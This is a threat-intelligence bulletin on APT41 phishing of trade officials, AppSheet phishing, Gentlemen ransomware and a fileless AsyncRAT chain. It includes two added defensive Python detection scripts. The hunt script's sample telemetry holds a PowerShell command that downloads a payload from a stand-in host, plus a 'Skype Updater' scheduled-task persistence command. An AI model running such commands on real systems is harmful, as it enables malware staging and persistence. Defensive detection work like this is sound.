TRENDING TOPICS SEPT 10, 2025

China-Linked APT41 Hackers Target U.S. Trade Officials Amid 2025 Negotiations 

The House Select Committee on China has issued a formal advisory warning of an ongoing cyber espionage campaign attributed to the China-linked threat group APT41, surfacing during a period of heightened U.S.–China trade negotiations. Investigators confirmed that the attacks targeted U.S. government agencies, trade associations, D.C. law firms, think tanks, and at least one foreign government, with the goal of collecting intelligence to shape policy outcomes. Threat actors impersonated Congressman John Robert Moolenaar (R-MI) in spear-phishing emails that attached malware-laden draft legislation and urged recipients to provide immediate feedback on sanctions against China. Once opened, the files deployed malware that enabled persistent access, credential harvesting, and stealthy exfiltration of sensitive data while abusing cloud services to mask traffic. The committee noted that attribution to APT41 is consistent with the group’s long history of state-backed operations against political, economic, and technology sectors worldwide. Analysts emphasize that the campaign demonstrates both tactical sophistication and a clear strategic alignment with the CCP's foreign policy priorities. This incident closely mirrors a January 2025 spear-phishing campaign targeting committee staffers, in which adversaries posed as representatives of ZPMC, a Chinese state-owned crane manufacturer, and attempted to steal Microsoft 365 credentials through fraudulent file-sharing notifications. The repetition of tailored lures highlights APT41’s persistence and adaptability, leveraging both industry-themed and political narratives to maximize credibility and bypass defensive measures. Experts warn that attackers are increasingly exploiting personal or non-official accounts of high-value individuals, knowing that such channels often fall outside enterprise monitoring, and then pivot into sensitive networks once trust is established. 
The advisory concludes that the timing, methods, and infrastructure align with CCP state-directed cyber-espionage, which aims to manipulate U.S. policy deliberations and gain leverage in trade talks. To mitigate these threats, organizations tied to trade and policy should deploy phishing-resistant MFA, strengthen detection of anomalous cloud activity, and require multi-channel verification for politically sensitive requests before taking action.

Hackers Impersonate Google AppSheet in Latest Phishing Campaign 

A newly uncovered phishing campaign is abusing Google’s AppSheet platform to deliver credential-harvesting emails that evade traditional defenses. AppSheet, integrated tightly with Google Workspace, is widely used for workflow automation and routinely sends legitimate notifications for access requests, data syncs, and system updates. Attackers are exploiting this inherent trust by embedding malicious links into AppSheet templates and distributing them via AppSheet’s own email infrastructure, which reliably passes SPF, DKIM, and DMARC checks. Abuse scenarios include hijacking compromised AppSheet accounts, creating new accounts solely to distribute phishing messages at scale, and injecting rogue URLs into user-generated templates. Because the messages originate from a legitimate Google domain, recipients perceive them as authentic, making the campaign especially effective in corporate environments where AppSheet messages are routine and seldom questioned. Detection in this case required context- and behavior-driven analysis rather than sender validation. Raven AI identified anomalies, including shortened redirector URLs, subject lines referencing legal compliance, and content mismatches between typical AppSheet notifications and the phishing lure. It also identified correlated patterns across polymorphic templates, detecting subtle shifts in wording while maintaining the same underlying objective of credential theft. To mitigate exposure, security teams should deploy behavioral email analysis capable of flagging contextually inconsistent messages, closely monitor AppSheet account activity for unauthorized template changes, and block suspicious shortener domains at the proxy level. Organizations should also conduct targeted awareness training, reminding users that even communications from well-known Google domains can be weaponized, and that unexpected requests for credential input must always be verified before taking any action.
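The point above is that sender authentication cannot catch these lures because the mail genuinely comes from Google infrastructure; the signals have to come from context. The following triage script is an added example (not code from the bulletin or from Raven AI) that scores constructed notification-style messages on the three signals the report names: shortener redirects, compliance-themed subjects, and a credential prompt that a routine AppSheet notification would never contain. The message fields, shortener list and threshold are assumptions for illustration.

```python
"""Added example (not part of the original bulletin): context-based triage for
notification-style emails whose SPF/DKIM/DMARC all pass, run over constructed messages."""
from urllib.parse import urlsplit

SHORTENERS = {"bit.ly", "tinyurl.com", "t.co", "is.gd"}          # public URL shorteners
COMPLIANCE_WORDS = ("compliance", "legal", "policy violation", "audit")
CREDENTIAL_ASKS = ("verify your password", "sign in to continue", "confirm your credentials")

# Constructed samples; both pass sender authentication, only one is a lure.
MESSAGES = [
    {"id": "m1", "from_domain": "appsheet.com", "auth": {"spf": "pass", "dkim": "pass", "dmarc": "pass"},
     "subject": "Action required: legal compliance review",
     "body": "Sign in to continue and acknowledge the updated policy.",
     "links": ["https://bit.ly/3xyzabc"]},
    {"id": "m2", "from_domain": "appsheet.com", "auth": {"spf": "pass", "dkim": "pass", "dmarc": "pass"},
     "subject": "Access request for Inventory App",
     "body": "Alice requested access to Inventory App. Review the request in AppSheet.",
     "links": ["https://www.appsheet.com/"]},
]

def sender_auth_ok(msg):
    """What a sender-validation-only control sees: every sample here returns True."""
    return all(v == "pass" for v in msg["auth"].values())

def context_signals(msg):
    """Behavioral signals the report's detection relied on, independent of sender auth."""
    signals = []
    hosts = {urlsplit(u).hostname or "" for u in msg["links"]}
    if hosts & SHORTENERS:
        signals.append("shortener_redirect")
    subject = msg["subject"].lower()
    if any(w in subject for w in COMPLIANCE_WORDS):
        signals.append("compliance_themed_subject")
    body = msg["body"].lower()
    if any(p in body for p in CREDENTIAL_ASKS):
        signals.append("credential_prompt_in_notification")  # routine AppSheet mail never asks this
    return signals

def verdict(msg, threshold=2):
    """'suspicious' when at least `threshold` context signals fire, regardless of auth result."""
    return "suspicious" if len(context_signals(msg)) >= threshold else "benign"

if __name__ == "__main__":
    for m in MESSAGES:
        print(m["id"], sender_auth_ok(m), context_signals(m), verdict(m))
```

Both samples pass sender authentication; only the context signals separate the lure from the legitimate access-request notification.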

Gentlemen Ransomware Exploits Drivers and Group Policies to Breach Organizations 

The newly emerged Gentlemen ransomware group has quickly established itself as a sophisticated and highly adaptive threat actor, conducting coordinated campaigns across at least 17 countries. First observed in August 2025, the group has demonstrated advanced capabilities by abusing legitimate signed drivers for kernel-level manipulation, leveraging Group Policy Objects (GPOs) for domain-wide compromise, and deploying custom anti-AV utilities specifically tailored to the targeted environment. Researchers have identified attacks targeting the manufacturing, construction, healthcare, and insurance sectors, with a concentration in the U.S. and Thailand. The group’s operational security practices—encrypted exfiltration via WinSCP, redundant persistence with AnyDesk, and registry modifications—underscore its methodical approach. Evidence also suggests that FortiGate administrative accounts have been compromised, providing the attackers with deep visibility into network traffic and serving as a potential entry point for lateral movement. The campaign employs a multi-stage methodology, starting with reconnaissance of Active Directory and security software configurations, followed by privilege escalation and the exploitation of legitimate tools, including PsExec, for lateral movement. After disabling Windows Defender through PowerShell commands and altering firewall rules, the actors distributed a password-protected ransomware payload via NETLOGON shares to achieve maximum domain impact. Their use of double extortion tactics—data theft combined with system encryption—further amplifies risk to critical infrastructure. This campaign illustrates the evolution of ransomware into highly tailored, enterprise-aware operations that blend living-off-the-land techniques with custom malware. 
Organizations are advised to strengthen defenses by monitoring for anomalous GPO changes, signed driver exploitation, and unauthorized administrative activity; enforcing strict segmentation; and preparing incident response plans.

Update: AsyncRAT Leverages Fileless Techniques to Bypass Detection 

Researchers have discovered a new campaign that highlights how threat actors are increasingly turning to fileless malware to evade detection, leveraging in-memory execution and trusted administrative tools to deploy AsyncRAT. The attack chain began when adversaries exploited a compromised ScreenConnect client, thereby gaining remote access to the target system. From there, attackers executed Update.vbs via WScript, which used PowerShell to fetch payloads (logs[.]ldk and logs[.]ldr) into C:\Users\Public\ and then convert them into byte arrays loaded directly into memory via reflection. The first-stage loader, Obfuscator[.]dll, operated entirely in memory, establishing persistence by creating a scheduled task masked as “Skype Updater,” while also disabling AMSI and ETW to prevent script logging and detection. By dynamically resolving API calls and removing forensic traces, the loader ensured that subsequent payloads could execute without leaving noticeable artifacts on disk. With defenses neutralized, the second stage introduced AsyncClient[.]exe, decrypted from Base64-encoded and AES-256 encrypted configuration data, which revealed persistence flags, target directories, and unique hardware IDs. The RAT then established a TCP-based heartbeat, using MessagePack packets to exchange commands and exfiltrated data. AsyncRAT performed host reconnaissance, harvesting system information, antivirus status, active windows, and browser extensions while exfiltrating clipboard contents, keystrokes, credentials, and cookies. Captured data was encrypted and uploaded to the C2, while persistence mechanisms were rebuilt if they had been disabled. The use of reflective loading, memory-only assemblies, and dual-scheduled tasks made this campaign highly resilient, emphasizing how fileless loaders weaponize normal tools to bypass AV/EDR controls. 
Security teams must adopt memory forensics, enforce strict policies for remote management utilities, monitor anomalous PowerShell and WScript activity, and require MFA for administrative access to disrupt these increasingly stealthy intrusions.
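To make the "monitor anomalous PowerShell and WScript activity" advice concrete, the following hunt rules are an added example (not code from the bulletin or from the researchers) that flags the behaviours described in the chain above: a script host spawning PowerShell, PowerShell staging files under C:\Users\Public\, and a scheduled task registered under the "Skype Updater" name. The event records are constructed to resemble Sysmon process-creation telemetry; their field names, PIDs and command lines are assumptions for illustration.

```python
"""Added example (not from the original bulletin): hunt rules for the AsyncRAT
fileless chain described above, run over constructed process-creation records."""
import re

# Constructed sample telemetry, shaped like Sysmon process-creation events.
SAMPLE_EVENTS = [
    {"pid": 4100, "ppid": 2200, "parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -w hidden -c iwr http://example.invalid/logs.ldk -OutFile C:\Users\Public\logs.ldk"},
    {"pid": 4188, "ppid": 4100, "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /tn "Skype Updater" /tr C:\Users\Public\Update.vbs /sc minute'},
    {"pid": 5020, "ppid": 900, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe notes.txt"},
]

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
PUBLIC_DIR = re.compile(r"c:\\users\\public\\", re.I)   # staging directory named in the report

def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()

def classify_event(ev):
    """Return the names of every hunt rule a single event trips."""
    hits = []
    parent, image, cmd = basename(ev["parent"]), basename(ev["image"]), ev["cmdline"]
    if parent in SCRIPT_HOSTS and image == "powershell.exe":
        hits.append("script_host_spawns_powershell")      # Update.vbs -> PowerShell stage
    if image == "powershell.exe" and PUBLIC_DIR.search(cmd):
        hits.append("powershell_writes_users_public")     # payload drop location
    if image == "schtasks.exe" and re.search(r"/create.*skype updater", cmd, re.I):
        hits.append("scheduled_task_skype_updater")       # persistence lure name
    return hits

def hunt(events):
    """Map pid -> rule hits for every event that trips at least one rule."""
    return {ev["pid"]: h for ev in events if (h := classify_event(ev))}

def chained(events, findings):
    """PIDs whose parent also tripped a rule: the two flagged events form one chain."""
    return {ev["pid"] for ev in events if ev["pid"] in findings and ev["ppid"] in findings}

if __name__ == "__main__":
    found = hunt(SAMPLE_EVENTS)
    for pid, rules in found.items():
        print(pid, rules)
    print("chained:", chained(SAMPLE_EVENTS, found))
```

The chain check matters because a single rule firing is noisy on its own; a PowerShell stage whose child registers the named task is the pattern worth escalating.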

Hunter Strategy encourages our readers to look for updates in our daily Trending Topics and on Twitter.